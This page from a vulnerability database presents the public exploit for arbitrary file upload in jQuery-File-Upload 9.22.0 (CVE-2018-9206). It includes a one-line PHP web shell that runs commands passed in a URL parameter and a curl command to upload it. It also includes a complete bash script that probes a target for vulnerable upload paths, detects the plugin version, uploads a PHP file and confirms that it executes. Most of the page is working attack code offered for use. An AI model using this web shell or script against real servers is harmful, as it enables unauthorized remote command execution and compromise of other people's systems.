Lucene search
K

jQuery-File-Upload 9.22.0 - Arbitrary File Upload

🗓️ 11 Oct 2018 00:00:00Reported by Larry W. CashdollarType 
exploitpack
 exploitpack
👁 85 Views

jQuery-File-Upload 9.22.0 Arbitrary File Upload allows remote code execution via server file uploa

Related
Code
ReporterTitlePublishedViews
Family
0day.today
blueimp jQuery Arbitrary File Upload Exploit
5 Nov 201800:00
zdt
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Jquery_File_Upload_Project Jquery_File_Upload
27 Dec 202502:31
githubexploit
Circl
CVE-2018-9206
11 Oct 201800:00
circl
CNVD
Blueimp jQuery-File-Upload Arbitrary File Upload Vulnerability
15 Oct 201800:00
cnvd
Check Point Advisories
Blueimp jQuery File Upload Remote Code Execution (CVE-2018-9206)
1 Nov 201800:00
checkpoint_advisories
CVE
CVE-2018-9206
11 Oct 201815:00
cve
Cvelist
CVE-2018-9206
11 Oct 201815:00
cvelist
Debian CVE
CVE-2018-9206
11 Oct 201815:00
debiancve
Dsquare
jQuery File Upload
18 Oct 201800:00
dsquare
Exploit DB
jQuery-File-Upload 9.22.0 - Arbitrary File Upload
11 Oct 201800:00
exploitdb
Rows per page
# Title: jQuery-File-Upload 9.22.0 - Arbitrary File Upload
# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A

# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php 
# doesn't require any validation to upload files to the server.  It also doesn't exclude file types.  
# This allows for remote code execution.

# shell.php:
<?php $cmd=$_GET['cmd']; system($cmd);?>

# Exploit Code:
$ curl -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php


#!/bin/bash 



USERAGENT="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"

PATHS=("server/php/upload.class.php" "example/upload.php" "server/php/UploadHandler.php" "php/index.php")

MALICIOUS_FILE="$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 12 | head -n 1).php"



# What is added in this exploit from the original version

# - a bit of refactoring

# - automatically request the right filename if it already exists on server ex: 'file (1).php'

# - Try to detect plugin version,

# - Try to detect index.html (allowing files upload via gui)



# Checking curl & jq



curl -h &>/dev/null

if [ $? -ne 0 ]; then

    echo "[!] Please install curl."

    echo "# apt install curl"

    exit 1

fi



jq -h &>/dev/null

if [ $? -ne 0 ]; then

    echo "[!] Please install jq."

    echo "# apt install jq"

    exit 1

fi



# Checking url



if [ -z $1 ]; then

    echo "[!] Please supply a target host as an argument."

    echo "$0 http://www.example.com"

    exit 1

fi



# Generating payload



echo "<?php echo \"it works\"; unlink(__FILE__); ?>" > ${MALICIOUS_FILE}

echo  "________________________________________________________________________________"

echo  "|PoC Exploit for Blueimp's jQuery File Uploader CVE-2018-9206"

echo  "|Checks for older versions of the code and upload an harmless file."

echo  "|"

echo  "| @_larry0, @phackt_ul"

echo  "|Works for version <= 9.22.0 and with Apache > 2.3.9 (AllowOverride None)."

echo  "---/"

echo

echo  "[+] Checking variations :"



# Creating alias



curl='curl --connect-timeout 10 -sk -A "${USERAGENT}"'



index=-1

found=0



# Looking for upload php class file



for x in ${PATHS[@]}; do

    echo "[*] Testing... -> $1/$x"

    ${curl} -i "$1/$x" | head -1 | grep 200 &>/dev/null



    if [ $? -eq 0 ]; then

        echo "[+] Found Path: $x"

        index=$((${index}+1))

        found=1

        break;

    fi;



    index=$((${index}+1))



done



# Determining the exploit path according to the jquery version



exploit_path=""



if [ ${index} -eq 0 -o ${index} -eq 2 ];then

    exploit_path="server/php/index.php"

fi



if [ ${index} -eq 1 ];then

    exploit_path="example/upload.php"

fi



if [ ${index} -eq 3 ];then

    exploit_path="php/index.php"

fi



if [ ${found} -ne 1 ]; then

    echo "[!] ### Error: A vulnerable jQuery-File-Upload plugin was not found!"

    exit 1

fi



# Trying to detect bower.json, package.json



version_files=("bower.json package.json")



for x in ${version_files[@]}; do

    version=`${curl} "$1/$x" | jq -r .version`

    if [ "X" != "X""${version}" ]; then

        echo "[!] Found: Plugin version ${version}"

        break;

    fi

done



# Trying to detect index.html



${curl} "$1/index.html" | grep -i "jquery file upload" &>/dev/null



if [ $? -eq 0 ]; then

    echo "[!] Found: $1/index.html is accessible"

fi



# Uploading payload



res=""

echo "[+] Running ${curl} -F \"files[]=@${MALICIOUS_FILE}\" -F \"filename=${MALICIOUS_FILE}\" \"$1/${exploit_path}\""



filename=`${curl} -F "files[]=@${MALICIOUS_FILE}" -F "filename=${MALICIOUS_FILE}" "$1/${exploit_path}" | jq -r .files[].name`



if [ "X""${filename}" == "X" ]; then

    echo "[!] It seems that we had a false positive! :("

    exit 1

fi



filename=`echo "$filename" | sed 's/ /%20/g'`



# Trying to see if victim has been exploited



echo "[+] Testing path: $1/$(dirname ${exploit_path})/files/${filename}"

res=`${curl} "$1/$(dirname ${exploit_path})/files/${filename}"`



if [ "${res}" == "it works" ]; then

    echo "[!] Found: $1 is vulnerable"

else

    echo "[+] Seems not vulnerable :("

fi



rm -f "${MALICIOUS_FILE}" &>/dev/null

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Oct 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.97107
85